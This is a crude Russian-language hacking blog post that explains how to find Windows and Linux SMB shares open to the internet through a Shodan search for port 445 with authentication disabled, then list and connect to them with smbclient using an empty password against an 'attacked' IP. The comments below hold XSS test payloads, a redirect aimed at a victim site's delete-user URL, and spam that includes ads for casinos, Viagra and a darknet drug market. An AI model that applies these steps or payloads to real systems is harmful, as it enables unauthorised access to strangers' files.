Взлом smb на windows и linux

Не то чтобы это статья, скорее напоминалка для себя как похекать шару за пару мин.
Не является руководством к действию, только показывает возможный сценарий действия злоебучего злоумышленника.

Всё просто как два пальца обоссать.
Поехали.
Идем на шодан.

Там ищем по порту 445. Также желательно добавить пару фильтров. Типа базовый запрос:

port:445 Authentication: disabled

а дальше сами играйте.

 

Теперь децл теории.

Большинство дистрибутивов Linux также включают полезный пакет smbfs, который позволяет монтировать и размонтировать SMB-ресурсы.

Для того, чтобы увидеть какие ресурсы доступны на данной машине, выполните команду:


    smbclient -L host (или ip адрес)

где ‘host’ это имя машины, которую вы хотите видеть. Эта команда вернет список имен ‘сервисов’ — т.е. имен дисков или принтеров к которым может быть получен доступ. До тех пор, пока SMB сервер не будет настроен без управления доступом, он будет запрашивать у вас пароль. Введите в ответ на запрос пароль для пользователя ‘гость (guest)’ или ваш персональный пароль на этой машине.

На практике можно просто уебать по клавише ENTER, т.к. пароль не установлен.

Вывод этой команды должен выглядеть примерно так:

Password: 
Domain=[WORKGROUP] OS=[Windows NT 3.51] Server=[NT LAN Manager 3.51]

Server=[ZIMMERMAN] User=[] Workgroup=[WORKGROUP] Domain=[]

        Sharename      Type      Comment
        ---------      ----      -------
        ADMIN$         Disk      Remote Admin
        public         Disk      Public 
        C$             Disk      Default share
        IPC$           IPC       Remote IPC
        OReilly        Printer   OReilly
        print$         Disk      Printer Drivers

Песдуем в терминал.

Для подключения к шаре пишем:

smbclient //192.168.1.12/public

где 192ю168ю1ю12 — атакуемый ip адрес, а рublic — название шары. На запрос пароля просто жмем ENTER (если нет заранее сбрученного пасса)

Итого:

 

Только рабочие преватные схемы!

Заходи почаще бротан. И выучи предыдущий урок по взлому ssh на ngrok серверах.

Запись опубликована в рубрике hacking с метками , , , , . Добавьте в закладки постоянную ссылку.

21 комментарий на «Взлом smb на windows и linux»

  1. FUck говорит:

    alert(document.location=»hacked»,document.location=»https://google.com»)
    Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser

  2. DelaySQl говорит:

    Ну шо погнали н@xyi(2)

    \Тестируем
    \На\
    \XSS\

  3. DelaySQl говорит:

    Ну шо погнали н@xyi(2)

    \LOOOOL\
    \LOOOOL\

  4. DelaySQl говорит:

    Ну шо погнали н@xyi

    \LOOOOL\
    \LOOOOL\

  5. BleatRAGE говорит:

    \xxs link\

    <alert(«XSS»);//\<

  6. WilliamVal говорит:

    Мне нравятся тут
    box24 casino

    А вам где нравится?

  7. elminmse говорит:

    online viagra price comparison buy viagra paypal
    get viagra overnight

  8. нихуя не @Hacked@

    сторайся ещо )

    • root2 говорит:

      Шо за дикий WAF амазонка не могу найти shell нашел директорию form/files/ а доступа то нема порты не сканятся nmapоп инет отлетает приходится учить другие разнообразные уязвимости 🙂

  9. alert("John") говорит:

    Всем привет)

  10. John Smith говорит:

    alert(«hacked’)

  11. Jamesutex говорит:

    Жил на острове Буяне
    мужичок с двумя х….
    По навету злого дяди
    про него узнали б….
    Стали строить корабли,
    словно век их не е….
    Режет судно гладь воды,
    в трюме триста две п…
    Остров впереди маячит,
    судно к острову х….
    Ровно месяц он пахал,
    сразу два в одну пихал.
    Всё истёр до ровной глади
    он на триста первой б….

    Здесь мораль витиевата,
    плохо, если баб богато.
    Чтоб не истереться в стружку,
    выбирай одну подружку … https://loveawake.ru

  12. Fedjukin914 говорит:

    Частотник ATV71HD37Y отличается от частотного преобразователя WJ200-007SF номинальной мощностью ПЧ, частотой работы ШИМ контроллера, алгоритмом работы системы автоматической диагностики неисправностей частотника, а также в большей степени наличием различных встроенных дополнительных функций, доступных для быстрой настройки и выполнения специализированных задач и полностью заменяющих собой шкаф автоматики для выполнения автоматической работы основного промышленного оборудования без использования дополнительных внешних элементов таких как контроллеры, панели оператора, промышленные компьютеры. Эти факторы играют решающую роль при выборе частотного преобразователя для реализации конкретных задач.

    Диагностика кодов ошибок и последующий долговечный ремонт на современном оборудовании преобразователей частотных, которые произведены фирмами danfoss, delta, веспер и другими мировыми брендами. Производство замены IGBT полупроводников, которые являются очень формирующие части во всем устройстве преобразовательной техники. Отличие транзистора IGBT от IGBT module заключается в том, что модуль может содержать один или более IGBT транзисторов, иногда включенных параллельно по схеме Darlington для увеличения коммутируемой мощности, а также в некоторых случаях схему мониторинга. IGBT — биполярный транзистор с изолированным затвором, представляет собой мощный полупроводниковый прибор обычно используемый как электронный переключатель для средних и высоких напряжений. Благодаря совмещению преимуществ биполярного транзистора и полевого транзистора достигается большая мощность коммутации и малая необходимая управляемая мощность, так как управление осуществляется не током, а полем, что приводит к высокому КПД этих элементов. Для того, чтобы узнать подробности посетите вебсайт преобразователи частоты

  13. Coronoger говорит:

    coronavirus hku1 rna Hgh therapy is essentially prescribed for individuals who are deficient in hormones and for anti aging benefits. http://www.eximworldbd.com/?virus-in-china-2020-usa If any of you are based around the woolwich area of town, you should totally head down and check it out if you are in the market for purchasing one yourself.

  14. Jamessab говорит:

    hydra зеркало рабочее 2019

    hydra магазин

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *